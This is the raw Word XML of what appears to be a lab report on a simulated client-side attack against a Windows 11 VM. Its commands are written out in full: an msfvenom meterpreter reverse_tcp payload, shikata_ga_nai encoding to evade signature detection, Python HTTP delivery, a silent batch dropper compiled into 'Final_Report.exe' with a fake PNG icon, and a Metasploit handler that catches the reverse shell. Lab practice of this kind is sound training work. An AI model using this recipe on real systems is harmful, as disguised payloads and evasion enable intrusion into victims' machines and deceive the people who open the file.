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E7951" w14:textId="24B89F8B" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00453074" w:rsidP="004530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53074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Task: Creating, Obfuscating, Disguising and Sharing a Payload for Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0A50C9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3074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14:paraId="35CA281B" w14:textId="153388DD" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00453074" w:rsidP="0077514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To simulate a client-side attack by creating a custom payload, obfuscating it, disguising it as a legitimate file using a fake icon, delivering it to a target machine (Windows)</w:t>
      </w:r>
      <w:r w:rsidR="0048364B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> via link</w:t>
      </w:r>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, and capturing a reverse shell session on the attacker's machine (Kali Linux). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D66A04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3074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tools Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ADEC74" w14:textId="77777777" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00453074" w:rsidP="00453074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Kali Linux (Attacker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4954DF2E" w14:textId="77777777" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00453074" w:rsidP="00453074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Windows 11 VM (Target)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5802B4A9" w14:textId="77777777" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00453074" w:rsidP="00453074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Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD9A623" w14:textId="77777777" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00453074" w:rsidP="00453074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 w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0AC77864" w14:textId="77777777" w:rsidR="00453074" w:rsidRDefault="00453074" w:rsidP="00453074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Python HTTP Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36530350" w14:textId="620DD82D" w:rsidR="00D75A97" w:rsidRPr="00453074" w:rsidRDefault="00D75A97" w:rsidP="00D75A9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Icon conversion tool (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Online </w:t>
      </w:r>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Free</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Convert)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2162488E" w14:textId="77777777" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00453074" w:rsidP="00453074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Bat To Exe Converter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF6B4A7" w14:textId="06B03BC2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3074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7D3991" w14:textId="62A3FC62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1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Payload Creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62166AC8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Initial payload was created using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a Windows target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF69FDA" w14:textId="17C13D62" w:rsidR="007116D4" w:rsidRDefault="007116D4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Command: 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msfvenom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 xml:space="preserve"> -p windows/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meterpreter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>/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reverse_tcp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 xml:space="preserve"> LHOST=192.168.150.133 LPORT=4444 -f exe -o payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DEB185" w14:textId="498D5DC9" w:rsidR="00D75A97" w:rsidRPr="00453074" w:rsidRDefault="00D75A97" w:rsidP="007116D4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58B06" wp14:editId="0D34B392">
            <wp:extent cx="5075207" cy="1111885"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15395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81" name="Picture 15395138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16593" r="40440" b="6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45" cy="112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60F7" w14:textId="48000480" w:rsidR="00453074" w:rsidRPr="007116D4" w:rsidRDefault="00453074" w:rsidP="007116D4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="007116D4" w:rsidRPr="007116D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="007116D4" w:rsidRPr="007116D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Payload creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E4D29D" w14:textId="472E32C8" w:rsidR="00D75A97" w:rsidRPr="00453074" w:rsidRDefault="00000000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370B8A8">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8FF74B" w14:textId="7CABE6BB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2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Payload Obfuscation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170EFEAC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Payload was obfuscated using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> encoder to evade signature-based detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354CBADE" w14:textId="76931279" w:rsidR="00453074" w:rsidRDefault="007116D4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Command: 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msfvenom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 xml:space="preserve"> -p windows/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meterpreter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>/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reverse_tcp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 xml:space="preserve"> LHOST=192.168.150.133 LPORT=4444 -e x86/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shikata_ga_nai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 xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00453074" w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00453074" w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5 -f exe -o obf_payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545B97D2" w14:textId="77777777" w:rsidR="007116D4" w:rsidRDefault="007116D4" w:rsidP="00453074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64FD3C98" w14:textId="3AE3E882" w:rsidR="007116D4" w:rsidRPr="00453074" w:rsidRDefault="007116D4" w:rsidP="007116D4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7A7E87" wp14:editId="2DEA69D3">
            <wp:extent cx="5562600" cy="1421553"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="876723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23738" name="Picture 2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29357" r="26878" b="46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71" cy="143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99AD5" w14:textId="3B62E41E" w:rsidR="00453074" w:rsidRPr="007116D4" w:rsidRDefault="00453074" w:rsidP="007116D4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="007116D4" w:rsidRPr="007116D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="007116D4" w:rsidRPr="007116D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Payload obfuscation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54430333" w14:textId="449DF871" w:rsidR="00D75A97" w:rsidRPr="00453074" w:rsidRDefault="00000000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9DEAC25">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3621DD9E" w14:textId="747DA1A6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3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Sharing Payload via HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3FCB71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Started a Python HTTP server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FC2C41" w14:textId="6DF56973" w:rsidR="007116D4" w:rsidRDefault="007116D4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Command: </w:t>
      </w:r>
      <w:r w:rsidR="00453074" w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00453074" w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00453074" w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4C8D1F" w14:textId="77777777" w:rsidR="007116D4" w:rsidRDefault="007116D4" w:rsidP="007116D4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C28459" wp14:editId="1D86B095">
            <wp:extent cx="4800600" cy="829339"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="170818104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1047" name="Picture 3" descr="A screen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52118" r="46821" b="3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296" cy="83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2761" w14:textId="1000BD6D" w:rsidR="00645761" w:rsidRDefault="007116D4" w:rsidP="0077514A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Pr="007116D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3.a</w:t>
      </w:r>
      <w:r w:rsidRPr="00453074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Sharing payload via HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C241E1E" w14:textId="77777777" w:rsidR="0077514A" w:rsidRPr="0077514A" w:rsidRDefault="0077514A" w:rsidP="0077514A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71778648" w14:textId="469349B3" w:rsidR="007116D4" w:rsidRDefault="00645761" w:rsidP="007116D4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5071D7" wp14:editId="72DCC89F">
            <wp:extent cx="4977130" cy="2987040"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="155697153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1539" name="Picture 4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9360"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1CF77" w14:textId="520D5B98" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="005061CD" w:rsidP="005061CD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Pr="007116D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3.b</w:t>
      </w:r>
      <w:r w:rsidRPr="00453074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Download the file obf_payload.exe</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:pict w14:anchorId="56333562">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC0E450" w14:textId="6D5DED7D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4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Creating Dropper Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C03DA54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A batch file was written to launch the obfuscated payload silently:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADBBFB9" w14:textId="382CE931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highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>@echo off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B571C1D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highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>start obf_payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2502F9AE" w14:textId="7E315C21" w:rsidR="005061CD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lastRenderedPageBreak/>
        <w:t>Saved as launcher.bat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DE3A69" w14:textId="06A0BA5B" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="005061CD" w:rsidP="005061CD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98003" wp14:editId="7FC1CCD2">
            <wp:extent cx="3708400" cy="2038350"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="16034306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0613" name="Picture 6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3" t="27121" r="11145" b="15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074" w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00453074" w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Screenshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 4: Creating script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137398A0" w14:textId="77777777" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00000000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593D802">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B2FABB" w14:textId="67F2684A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5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Changing the Icon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7149B225" w14:textId="5D3B2C52" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00453074" w:rsidP="00453074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Converted a custom icon using Free</w:t>
      </w:r>
      <w:r w:rsidR="009052E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Convert</w:t>
      </w:r>
      <w:r w:rsidR="009052E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>er Online</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334429F5" w14:textId="57F3A8E9" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00453074" w:rsidP="00453074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Used Bat </w:t>
      </w:r>
      <w:r w:rsidR="0077514A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>o Exe Converter to compile the .bat into an .exe named Final_Report.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590A60DD" w14:textId="42A00586" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00453074" w:rsidP="00453074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Set the fake </w:t>
      </w:r>
      <w:r w:rsidR="0077514A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>PNG</w:t>
      </w:r>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> icon to make the file look innocent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D783B5" w14:textId="26E4A068" w:rsidR="009052E8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Screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA1B0F5" w14:textId="5A24622F" w:rsidR="005061CD" w:rsidRPr="00453074" w:rsidRDefault="005061CD" w:rsidP="009052E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483123" wp14:editId="34B1582E">
            <wp:extent cx="4963160" cy="2984500"/>
            <wp:effectExtent l="0" t="0" r="8890" b="6350"/>
            <wp:docPr id="17426953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5334" name="Picture 7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9573" b="7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A14" w14:textId="03DBFF82" w:rsidR="00453074" w:rsidRDefault="00453074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="009052E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.a:</w:t>
      </w:r>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Icon conversion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F84D807" w14:textId="77777777" w:rsidR="009052E8" w:rsidRDefault="009052E8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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F20F546" w14:textId="2986B2C4" w:rsidR="009052E8" w:rsidRPr="00453074" w:rsidRDefault="009052E8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2A76A" wp14:editId="5BEC051B">
            <wp:extent cx="4362350" cy="2611424"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="140569181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1816" name="Picture 8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22869" r="15134" b="1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506" cy="26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901E" w14:textId="72204574" w:rsidR="00453074" w:rsidRDefault="00453074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="009052E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.b: </w:t>
      </w:r>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Bat </w:t>
      </w:r>
      <w:r w:rsidR="00D75A97" w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exe setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AB6DC7" w14:textId="77777777" w:rsidR="009052E8" w:rsidRDefault="009052E8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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="471D8CC6" w14:textId="0B51941A" w:rsidR="009052E8" w:rsidRPr="00453074" w:rsidRDefault="009052E8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25579A" wp14:editId="6B5CA327">
            <wp:extent cx="4464670" cy="2501900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31380232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02324" name="Picture 9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8" t="23223" r="13583" b="24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32" cy="250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BCAB" w14:textId="4924398B" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00453074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i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Screensh</w:t>
      </w:r>
      <w:r w:rsidR="009052E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">ot 5.c: </w:t>
      </w:r>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Final</w:t>
      </w:r>
      <w:r w:rsidR="009052E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>_report</w:t>
      </w:r>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.exe created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D5C9EF" w14:textId="77777777" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00000000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D26B51">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B09930" w14:textId="2F6D6614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6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Execution and Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F1853A" w14:textId="77777777" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00453074" w:rsidP="00453074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Final_Report.exe was executed on the Windows 11 VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A90E428" w14:textId="77777777" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00453074" w:rsidP="00453074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A reverse shell was successfully received on Kali via Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28596FCC" w14:textId="64F587F1" w:rsidR="009052E8" w:rsidRDefault="009052E8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Commands: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009052E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="738D7D16" w14:textId="0DC0611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highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1604BBCB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highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>set PAYLOAD windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4EA50588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highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>set LHOST 192.168.150.133</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD20162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highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00453074">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120BFED9" w14:textId="713C7B3C" w:rsidR="009052E8" w:rsidRDefault="00453074" w:rsidP="009052E8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highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EA0682" w14:textId="5525466F" w:rsidR="009052E8" w:rsidRDefault="009052E8" w:rsidP="009052E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362FC" wp14:editId="247CD499">
            <wp:extent cx="5585685" cy="3200400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12813055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05529" name="Picture 12813055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9785" r="155" b="1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14" cy="320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6E2F4" w14:textId="7A151A91" w:rsidR="009052E8" w:rsidRPr="00453074" w:rsidRDefault="009052E8" w:rsidP="009052E8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  <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Screensh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">ot 6: </w:t>
      </w:r>
      <w:r w:rsidR="0022155B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Meterpreter session opened</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E9B331" w14:textId="77777777" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00000000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A6BCACF">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="788C436D" w14:textId="325D24C5" w:rsidR="00453074" w:rsidRPr="00453074" w:rsidRDefault="00D75A97" w:rsidP="00453074">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D75A97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
